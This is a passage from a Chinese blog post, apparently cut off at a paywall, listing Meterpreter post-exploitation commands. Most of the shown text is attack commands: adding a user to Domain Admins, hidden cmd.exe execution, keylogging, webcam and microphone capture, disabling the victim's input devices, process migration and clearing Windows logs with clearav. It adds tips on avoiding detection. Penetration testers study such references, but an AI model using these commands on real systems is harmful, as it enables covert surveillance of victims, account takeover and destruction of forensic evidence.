本文详细介绍了Meterpreter后渗透阶段的各种操作,包括系统命令、文件操作、网络操作、信息收集、提权和后门植入,如快捷操作、端口转发、抓取密码hash、注册表后门等,是渗透测试人员的重要参考资料。
一.系统命令
1.快捷操作
此板块用于记录用于操作meterpreter的指令
sessions #查看全部会话 –h 查看帮助
sessions -i <shell ID> #进入会话 -k 杀死会话
background #将当前会话放置后台
run #执行已有的模块,输入run后按两下tab,列出已有的脚本
info #查看已有模块信息
2.基础系统命令
getuid # 查看权限
getpid # 获取当前进程的pid
sysinfo # 查看目标机系统信息
ps # 查看当前活跃进程 kill <PID值> 杀死进程
idletime #查看目标机闲置时间
reboot / shutdown #重启/关机
shell #进入目标机cmd shell
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
add_user username password -h ip #在远程目标主机上添加一个用户
add_group_user "Domain Admins" username -h ip #将用户添加到目标主机的域管理员组中
3.外设操作
用于操作目标机外设来实现一些迷惑操作
uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标
webcam_list #查看摄像头
webcam_snap #通过摄像头拍照
webcam_stream #通过摄像头开启视频,不要开启流,非常容易被抓到
keyscan_start #开始键盘记录
keyscan_dump #导出记录数据
keyscan_stop #结束键盘记录
record_mic #音频录制
4.隐藏痕迹
getpid # 获取当前进程的pid
ps # 查看当前活跃进程
migrate <pid值> #将Meterpreter会话移植到指定pid值进程中
kill <pid值> #杀死进程
clearav #清除windows中的应用程序日志、系统日志、安全日志
5.远程桌面
enumdesktops #查看可用的桌面
getdesktop #获取当前meterpreter 关联的桌面
set_desktop #设置meterpreter关联的桌面 -h查看帮助
screenshot #截屏
use espia #或者使用espia模块截屏 然后输入screengrab
run vnc #使用vnc远程桌面连接,只可以看
# 不推荐连接远程桌面,非要连用vnc,不要用getgui
run getgui –h #查看帮助
run getgui -e #开启远程桌面
最低0.47元/天 解锁文章
1928
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
